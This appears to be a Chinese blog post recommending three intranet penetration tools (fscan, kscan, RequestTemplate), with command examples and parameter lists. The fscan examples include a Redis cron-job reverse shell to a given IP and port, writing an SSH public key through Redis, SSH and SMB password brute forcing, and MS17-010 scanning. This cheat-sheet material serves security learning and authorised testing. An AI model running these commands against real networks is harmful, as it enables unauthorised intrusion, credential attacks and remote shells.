****************免责声明:任何工具等分享仅以学习为目的************************

分享三款内网十分好用的渗透神器

1 . fscan

项目地址:https://github.com/shadow1ng/fscan/releases/tag/1.7.1

工具使用细节:

fscan详细命令说明:

fscan -h 0.0.0.0/8 (全网段扫描)
fscan -h 192.168.1.1/24  (默认使用全部模块)  ***扫描C段****
fscan -h 192.168.1.1/16  (B段扫描)  ****直接扫描整个B段*****
fscan -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan -h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan -hf ip.txt  (以文件导入)(扫描某些IP,将IP写入txt)*********
fscan -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)

fscan参数说明

-c stringssh命令执行-cookie string设置cookie-debug int多久没响应,就打印当前进度(default 60)-domain stringsmb爆破模块时,设置域名-h string目标ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12-hf string读取文件中的目标-hn string扫描时,要跳过的ip: -hn 192.168.1.1/24*****白名单过滤IP-m string设置扫描模式: -m ssh (default "all")-no扫描结果不保存到文件中-nobr跳过sql、ftp、ssh等的密码爆破-nopoc   跳过web poc扫描(不做web扫描)***************-np跳过存活探测-num intweb poc 发包速率  (default 20)-o string扫描结果保存到哪 (default "result.txt")-p string设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017")-pa string新增需要扫描的端口,-pa 3389 (会在原有端口列表基础上,新增该端口)-path stringfcgi、smb romote file path-ping使用ping代替icmp进行存活探测-pn string扫描时要跳过的端口,as: -pn 445-pocname string指定web poc的模糊名字, -pocname weblogic-proxy string设置代理, -proxy http://127.0.0.1:8080-user string指定爆破时的用户名-userf string指定爆破时的用户名文件-pwd string指定爆破时的密码-pwdf string指定爆破时的密码文件-rf string指定redis写公钥用模块的文件 (as: -rf id_rsa.pub)-rs stringredis计划任务反弹shell的ip端口 (as: -rs 192.168.1.1:6666)-silent静默扫描,适合cs扫描时不回显-sshkey stringssh连接时,指定ssh私钥-t int扫描线程 (default 600)-time int端口扫描超时时间 (default 3)-u string指定Url扫描-uf string指定Url文件扫描-wt intweb访问超时时间 (default 5)

fscan 扫描完成后会生成文件  result.txt文件(标准格式直接复制到excel即可,无需整理格式)

2. kscan

项目地址:https://github.com/lcvvvv/kscan

工具使用细节:

kscan命令说明:

usage: kscan [-h,--help,--fofa-syntax] (-t,--target,-f,--fofa,--spy) [-p,--port|--top] [-o,--output] [-oJ] [--proxy] [--threads] [--path] [--host] [--timeout] [-Pn] [-Cn] [-sV] [--check] [--encoding] [--hydra] [hydra options] [fofa options]optional arguments:-h , --help     show this help message and exit-f , --fofa     从fofa获取检测对象,需提前配置环境变量:FOFA_EMAIL、FOFA_KEY-t , --target   指定探测对象:IP地址:114.114.114.114IP地址段:114.114.114.114/24,不建议子网掩码小于12IP地址段:114.114.114.114-115.115.115.115URL地址:https://www.baidu.com文件地址:file:/tmp/target.txt--spy           网段探测模式,此模式下将自动探测主机可达的内网网段可接收参数为:(空)、192、10、172、all、指定IP地址(将探测该IP地址B段存活网关)--check         针对目标地址做指纹识别,仅不会进行端口探测--scan          将针对--fofa、--spy提供的目标对象,进行端口扫描和指纹识别-p , --port     扫描指定端口,默认会扫描TOP400,支持:80,8080,8088-8090-eP, --excluded-port 跳过扫描指定的端口,支持:80,8080,8088-8090-o , --output   将扫描结果保存到文件-oJ             将扫描结果使用json格式保存到文件-Pn              使用此参数后,将不会进行智能存活性探测,现在默认会开启智能存活性探测,提高效率-Cn             使用此参数后,控制台输出结果将不会带颜色-Dn             使用此参数后,将关闭CDN识别功能-sV             使用此参数后,将对所有端口进行全探针探测,此参数极度影响效率,慎用!--top           扫描经过筛选处理的常见端口TopX,最高支持1000个,默认为TOP400--proxy         设置代理(socks5|socks4|https|http)://IP:Port--threads       线程参数,默认线程100,最大值为2048--path          指定请求访问的目录,只支持单个目录--host          指定所有请求的头部Host值--timeout       设置超时时间--encoding      设置终端输出编码,可指定为:gb2312、utf-8--match         对资产返回banner进行检索,存在关键字的,才会显示,否则不会显示--hydra         自动化爆破支持协议:ssh,rdp,ftp,smb,mysql,mssql,oracle,postgresql,mongodb,redis,默认会开启全部
hydra options:--hydra-user   自定义hydra爆破用户名:username or user1,user2 or file:username.txt--hydra-pass   自定义hydra爆破密码:password or pass1,pass2 or file:password.txt若密码中存在使用逗号的情况,则使用\,进行转义,其他符号无需转义--hydra-update 自定义用户名、密码模式,若携带此参数,则为新增模式,会将用户名和密码补充在默认字典后面。否则将替换默认字典。--hydra-mod    指定自动化暴力破解模块:rdp or rdp,ssh,smb
fofa options:--fofa-syntax  将获取fofa搜索语法说明--fofa-size    将设置fofa返回条目数,默认100条--fofa-fix-keyword 修饰keyword,该参数中的{}最终会替换成-f参数的值

3: MS08067大佬自研工具:RequestTemplate(支持批量验证,一键利用)

项目地址:https://github.com/1n7erface/RequestTemplate

扫描结束后

java -jar RequestTemplate.jar 开启服务端
将扫描输出结果  output.txt导入批量验证服务端  进行批量验证,截图等操作

RequestTemplate 工具使用细节:

命令/参数**使用说明

 -a string    *自动检测172 10 192网络连通性 (default "false") -b string   *只暴力破解 不进行web扫描 (default "false")-c string    *auto check 192 or 172 or 10*-e stringprint error log (default "false")-i string 扫描C段   -i  192.168.1.1/24-i 192.168.11.11-255

推荐三款内网渗透神器!相关推荐

  1. 推荐一款内网穿透神器

    一.项目简介 中微子代理(neutrino-proxy)是一个基于netty的.开源的java内网穿透项目.遵循MIT许可,因此您可以对它进行复制.修改.传播并用于任何个人或商业行为. 中微子,是轻子 ...

  2. 内网渗透神器:fscan使用攻略

    1.简介 Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化.并且全方位漏洞扫描.它支持主机存活探测.端口扫描.常见服务的爆破.ms17010.redis批量写公钥.计划任务反弹 ...

  3. 忆享科技戟星安全实验室|内网渗透神器-Viper的基本使用

    戟星安全实验室 忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试.代码审计.应急响应.漏洞研究.威胁情报.安全运维.攻防演练等 本文约1200字,阅读约需4分钟. 0x00 介绍 vipe ...

  4. 推荐一款内网扫描的轻量渗透工具-K8的Ladon

    项目地址:https://github.com/k8gege/Ladon Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描.服务识别.网络资产.密码爆破.高危漏洞检测以及一键Get ...

  5. 内网渗透神器xerosploit

    项目地址:https://github.com/LionSec/xerosploit 安装完成后直接在终端输入xerosploit打开 显示了本机的内网ip,mac地址,网关,网卡,输入help查看帮 ...

  6. 红队内网渗透神器--CobaltStrike安装教程

    CobaltStrike介绍: CobaltStrike是一款渗透测试神器,被业界人称为CS神器.CobaltStrike分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作 ...

  7. 内网渗透神器(Mimikatz)——使用教程

    项目地址:https://github.com/gentilkiwi/mimikatz/ 一.工具简介 Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试, ...

  8. 内网渗透神器CobaltStrike之钓鱼攻击(六)

    一.HTA木马 简介 HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件.HTA虽然用HTML.JS和CSS编写,却比普通网页权限大得多,它具有桌面 ...

  9. 内网渗透神器CobaltStrike之DNS Beacon(四)

    DNS隧道简介 利用DNS隧道进行攻击的现象已存在多年,将数据封装在DNS协议中传输,大部分防火墙和入侵检测设备很少会过滤DNS流量,僵尸网络和入侵攻击可几乎无限制地加以利用,实现诸如远控.文件传输等 ...

  10. 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)

    http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...

最新文章

  1. 软件测试模型以及测试方法
  2. reverseString
  3. 《雷达技术丛书》分享
  4. 深入理解Kafka(4)-主题与分区
  5. java 反射 new class_Java高级特性-反射:不写死在代码,还怎么 new 对象?
  6. Vue + Spring Boot 项目实战(七):前端路由与登录拦截器
  7. 单精度浮点数(float)加法计算出错
  8. Debian 9 Stretch国内常用镜像源
  9. 如何使用Java语言实现一个网页爬虫
  10. IDEA导入项目之后可运行不报错但在JSP页面出现下列情况,求各位大佬给个解决办法,万分感谢
  11. 在python中正确的赋值语句为3y=x+1-在 Python 中,正确的赋值语句为 ( ) 。_学小易找答案...
  12. 【WebService笔记01】使用JWS实现WebService接口的发布和调用
  13. 有特色的出版社图书封面
  14. 很好用的数据库数据字典【可导出为word , excel文件】
  15. JSRPC: WebSocket报错 Refused to connect to ‘ws:<URL>/ws?group=testname=wangluozhe‘ because it violate
  16. 【微信小程序】一文带你吃透小程序开发框架——视图层中的事件系统
  17. Python3.7学习笔记30-垃圾回收机制
  18. splite()方法的使用
  19. MQ-2烟雾传感器检测
  20. 吊炸天!程序员定制版高效摸鱼神器...

热门文章

  1. Unity3D:鼠标移动视角+键盘移动位置实现
  2. mjd122的典型应用_MJD122_07中文资料
  3. android studio如何编译运行,Android Studio编辑器教程
  4. 浙江省数据管理有限公司总经理周耀邦:政府部门数字化转型大有可为
  5. 国产网络性能测试工具smartbits操作技巧
  6. 支持动态调频,AXP228电源管理,预留锂电池接口,内置充放电电路及电量计iTOP-4418开发板...
  7. 海航云聊大数据,解密海航科技集团待遇情况
  8. 应聘时漂亮的回答(转自CSDN)
  9. MobaXterm 中文乱码, 及pojie
  10. C语言 悬空else问题